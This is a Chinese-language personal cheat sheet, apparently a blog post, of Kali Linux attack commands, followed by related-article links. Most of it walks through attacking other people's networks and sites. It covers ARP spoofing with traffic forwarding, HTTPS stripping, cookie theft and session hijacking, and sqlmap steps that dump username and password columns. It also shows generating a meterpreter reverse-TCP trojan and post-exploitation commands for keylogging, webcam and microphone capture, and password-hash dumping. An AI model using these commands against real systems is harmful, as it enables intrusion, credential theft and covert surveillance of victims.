kali help

Attention

这是我N久前学习kali时自己打的东西,不保证没有纰漏啊……

网址

kali:
https://www.herojd.com/forum.php?mod=viewthread&tid=34

网站破解:
目录:
https://www.herojd.com/forum.php?gid=50

Burpsuite:
https://www.herojd.com/forum.php?mod=viewthread&tid=25
https://www.herojd.com/forum.php?mod=viewthread&tid=24

部分常用指令

ls

显示目录(原dir)

rm

删除(就是remove嘛)

进入目录(这个和cmd一样)

cd

返回上级目录(在Windows中是cd/或cd..)

ifconfig

查看内网IP

cat

查看内容

vim 文件名
文档编辑器,不存在就新建
不保存,退出

  1. 按下ESC
  2. 按下shift+:
  3. 输入q!(不保存,退出的意思)

编辑

  1. 按i键
  2. 按ESC
  3. 按shift+:
  4. 按wq(保存,退出)

查找IP

fping -a -g 目标IP列表
-a显示是"活着"的目标
-b n 大量 ping 数据要发送,以字节为单位 (默认 56)
-f 文件读取列表中的目标是从一个文件 (-意味着 stdin) (仅当没有-g 指定)
-g 生成目标列表 (仅当没有-f 指定)
(指定的开始和结束 IP 在目标列表中,或提供一个 IP 子网掩码)
(如: fping -a -g 192.168.1.0 192.168.1.255 或 fping -a -g 192.168.1.0/24)

nmap -Ss 目标ip
查看目标IP开放端口
nmap -sP 192.168.0.*
把你网段里的所有主机都找出来

nmap -O 目标ip

断网攻击+流量转发

arpspoof -i 网卡 -t 目标IP 我的网关
使目标IP进入我的网卡

echo 1 >/proc/sys/net/ipv4/ip_forward
进行IP流量转发(意为把1赋给一个文件)

driftnet -i 网卡
获取经过本机网卡的图片

欺骗攻击(http/https)

ettercap
欺骗工具,DNS欺骗,流量嗅探等
ettercap -Tq -i 网卡
启动文本模式欺骗http
ps:!ettercap会执行上一次的ettercap执行代码
ps: ettercap会自动转发,无需再echo 1 >/proc/sys/net/ipv4/ip_forward,别转发两次

sslstrip
把https的链接还原成http(但是易出现证书错误,也有概率抓不到包)

最后,若不是明文,就到百度上去URL解码

会话劫持

利用cookies,直接登录。
wireshark
抓包
方法一
1、输入wireshark,选择网卡开始
2、等待目标IP登陆,等待网络延迟
3、当出现大量DNS记录后,点红色小方框暂停
4、file->save as(另存为)桌面->格式选择pcap(可能是第二个)现在可以关闭欺骗
5、终端进入到桌面,输入ferret指令
6、使用hamster指令
7、改代理服务器:浏览器的Edit->Preferences->Advanced->选Manual proxy configuration->修改IP与端口
8、访问第五行的IP:端口
9、会出现被欺骗IP的链接,点击。若未出现,则是没抓到包
10、在左边一栏查找可能是登录的网址(要有耐心哟(^U^)ノ~)
PS:优先找全域名的哟(^U^)ノ~
方法二
1、无需欺骗,输入ferret -i 网卡可获取所有网段IP
2、同时,删除hamster.txt,再同时使用hamster指令
3、改代理服务器
4、打开网页后,选adapters,输入网卡,点Submit Query
5、在对方浏览网页是,网页会实时更新
6、若无用,重新执行ferret和hamster指令,并等待ferret指令执行完毕
7、在左边一栏查找可能是登录的网址(要有耐心哟(^U^)ノ~)
PS:优先找全域名的哟(^U^)ノ~
方法三(关闭代理!!!)
1、直接打开cookies.jar(关闭代理!!!)
2、选择网卡开始
3、这时就已经在实时更新。当出现蓝色字体时,过一会点开
4、在中间一栏查找可能是登录的网址(要有耐心哟(^U^)ノ~)
5、觉得是可能的,就选中,点击Lead Demaln Cookies
6、会弹出一个浏览器窗口,耐心的等它加载(做一个黑客就是要有耐心!)

ferret
重新生成抓包后的文件
ferret -r 文件名.pcap
会把原来抓包的pcap文件重新生成为txt文件
ferret -i
网卡可获取所有网段IP
hamster
重放流量
直接输入,后把http端口改成3/4行括号里的端口,并且访问第五行的IP:端口

sqlmap渗透注sql

ASP网站

sqlmap -u 网址
检测是否存在注入并返回数据库的类型

sqlmap -u 网址 --table
猜解所有表名(耐性等待)

sqlmap -u 网址 --columns -T"user"
(columns)
猜列名
(user)
根据经验确定这是用户表

PHP网站

sqlmap -u 网址(加协议和双引号)
检测

sqlmap -u 网址(加协议和双引号) --is-dba
检测网站是否为dba权限

sqlmap -u 网址(加协议和双引号) --dbs
列出所有数据库

sqlmap -u 网址(加协议和双引号) --dba
列出所有数据库

sqlmap -u 网址(加协议和双引号) --current-db
查找自己的数据库

sqlmap -u 网址(加协议和双引号) --table-D"数据库名"
查询所有表名(根据数据库)

sqlmap -u 网址(加协议和双引号) --columns -T "上一步中可能是管理员的表名"-D"数据库名"
查询所有列

sqlmap -u 网址(加协议和双引号) --dump -C "username,password" -T "上一步中可能是管理员的表名"-D"数据库名"
查询所有列

Cookies注入
或许,在某些站的网址后加入and 1=2会有错误提示,那就是这个网站可用Cookies注入了
先尝试常规注入
sqlmap -u 网址(加协议和双引号)
检测(一般没用,会出现黄色的错误)

cookies检测
sqlmap -u 网址(加协议和双引号且不要id = ***) --cookies "id参数" --level 2
如果是cookies注入,就要把等级提升为level 2

sqlmap -u 网址(加协议和双引号且不要id = ***) --tables --cookies "id参数" --level 2
猜解(耐性等待哟(^U^)ノ~!)

msfconsole

输入即可启动(速度较慢)

show
显示所有漏洞

use exploit/windows/smb/ms08

msfpayload windows/meterpreter/reverse_tcp LHOST=本机ip LPORT=高端口 X > test.exe
生成木马

exploit/multi/handler
使用handler模块

set PAYLOAD windows/meterpreter/reverse_tcp
使用shellcode

set LHOST=本机ip
set LPORT=高端口
设置。。。

等待目标打开

sysinfo
目标主机信息

shell
获取目标主机shell

因为木马随时可能被结束进程
所以要注入进程

ps
查看目标主机进程

migrate 进程ID
注入进程(常用explorer.exe)

run vnc
远程桌面

文件管理
Download
下载文件
Edit
编辑文件
cat
查看文件
cd
切换目录
mkdir
创建文件
mv
移动文件
rm
删除文件
upload
上传文件
rmdir
删除文件夹

网络及系统操作
Arp
查看arp缓冲表
ifconfip
IP
Getproxy
获得代理
Netstat
查看端口连接
kill
杀死进程
ps
查看进程
reboot
重启电脑
reg
修改注册表
shell
获得shell
shutdown
关机
sysinfo
主机信息

用户操作及其他功能
enumedesktops
窗体
keyscan_start
键盘记录开始
keyscan_dump
键盘记录下载
keyscan_stop
键盘记录结束
uictl 关闭desable或开启enable mouse或keyboard
获得鼠标键盘控制权
record_mic
音频录制
webcan_chat
查看摄像头接口
webcan_list
查看摄像头列表
webcan_stream
摄像头获取
getsystem
获得高权限
hashdump
下载hash表

kali帮助的更多相关文章

  1. Kali对wifi的破解记录

    好记性不如烂笔头,记录一下. 我是在淘宝买的拓实N87,Kali可以识别,还行. 操作系统:Kali 开始吧. 查看一下网卡的接口.命令如下 airmon-ng 可以看出接口名称是wlan0mon. ...

  2. 逆天Kali带你游遍大江南北~安全之前人铺路!

    0.Linux基础学习(基本指令) http://www.cnblogs.com/dunitian/p/4822807.html 1.Kali安装到移动硬盘或者U盘中~Linux系列通用方法(包括An ...

  3. kali linux下的arp攻击

    这是我第一篇博客,写的不好请谅解 ____________________________(分割线)_______________________________ 在kali linux系统下自带工具 ...

  4. U盘安装Kali 出现cd-rom无法挂载 已解决

    用U盘安装Kali Linux的过程中,出现cd-rom无法挂载的现象,百度坑比啊,醉了.下面亲测成功 出现无法挂载后,选择执行shell 第一步:df -m此时会看到挂载信息,最下面的是/dev/* ...

  5. 1.Kali安装到移动硬盘或者U盘中~Linux系通用方法(包括Android)

    0.1.保证这个服务必须启动(虚拟机服务最好都启动) 0.2.看看U盘接口类型是否对应 1.安装第一步 2.安装第二步,选择kali镜像 3.设置存放位置(上面的名字无所谓,最后不会用它的,虚拟机只是 ...

  6. 3.Kali 1.0 / 2.0 安装中文输入法(谷歌pinyin + 其他)

    1.kali默认是没有中午输入法的,需要自己安装一下 2.首先我们先获取root权限 dnt@HackerKali:~$ su密码: 3.安装中文输入法(apt-get 指令不会的同学可以学习一下基础 ...

  7. 4.修改更新源sources.list,提高软件下载安装速度(提供Kali 2.0 更新源)

    1.切换到root用户(如果已经是root用户就直接看第二步) dnt@HackerKali:~$ su 密码: 2.用文本编辑器打开sources.list,手动添加下面的更新源 root@Hack ...

  8. ★Kali信息收集~ 1.Google Hacking + Github Hacking

    一.google hacking site site:cnblogs.com 毒逆天 intitle intitle:login allintitle allintitle:index of alli ...

  9. ★Kali信息收集~3.子域名系列

    ★3.1Netcraft :子域名查询  官网:http://searchdns.netcraft.com/ 输入要查询的域名,即可得知子域名 3.2Fierce :子域名查询 概述: fierce ...

  10. ★Kali信息收集~4.DNS系列

    ★.1host:DNS信息 参数: 一般情况下,host查找的是A,AAAA,和MX的记录 案例: DNS服务器查询  host -t ns 域名 A记录和MX记录查询  host 域名(host - ...

随机推荐

  1. influxdb基础那些事儿

    InfluxDB是一个开源的时序数据库,使用GO语言开发,特别适合用于处理和分析资源监控数据这种时序相关数据.而InfluxDB自带的各种特殊函数如求标准差,随机取样数据,统计数据变化比等,使数据统计 ...

  2. Miniio安装登陆密码报错问题,注意检查区分带小写!

    ------------恢复内容开始------------ #创建minio专用文件目录mkdir -p /app/minio/datamkdir -p /app/minio/configchmod ...

  3. applyColorMap 在OpenCV中对灰度图进行颜色映射,实现数据的色彩化

    什么是色彩映射: 说直白点就是将各种数据映射成颜色信息,例如:温度,高度,压力,密度,湿度,城市拥堵数据等等 色彩化后更加直观表达 在OpenCV里可以使用 Mat im_gray = imread( ...

  4. 02--java--环境搭建

    第一步,下载JDK 去ORACLE官网http://www.oracle.com下载 有安装版和绿色版,安装版一路下一步,绿色版解压缩压缩包就行了 安装版直接自动配置环境变量,绿色版需要自己配置环境变 ...

  5. linux pycharm 安装

    Ubuntu安装之python开发   什么??公司要用Ubuntu(乌班图)?不会用??怎么进行python开发??? 乌班图操作系统下载地址:http://releases.ubuntu.com/ ...

  6. 【置顶】入驻百家号【九哥聊IT】和【九哥九嫂小日子】,欢迎关注

    欢迎大家关注. 1.关注百家号[九哥聊IT],每天专注讲解互联网最新资讯和知识分享.2.关注百家号[九哥九嫂小日子],带你看下班之外的九哥.

  7. 搭建本地测试es集群

    需求 在本地搭建es+kibana+elasticsearch-head 搭建环境 mac本地,使用docker+docker-compose 方式搭建 设置docker 内存8G 搭建es和es+h ...

  8. webpack4.0 ---引用vue文件

    一.引入Vue 1.安装依赖环境 npm i vue-loader -D;//解析转化.vue文件,npm i vue-style-loader -D npm i vue-template-compi ...

  9. Docker底层架构之简介

    简介 Docker 底层的核心技术包括 Linux 上的命名空间(Namespaces) 控制组(Control groups) Union 文件系统(Union file systems) 容器格式 ...

  10. MySQL5.6数据导入MySQL5.7报错:ERROR 1031 (HY000)

    一.故障现象 今天将一个在MySQL5.7上的数据导入到MySQL5.6里面去,默认存储引擎都是InnoDB,导入报错如下: [root@oratest52 data]# mysql -uroot - ...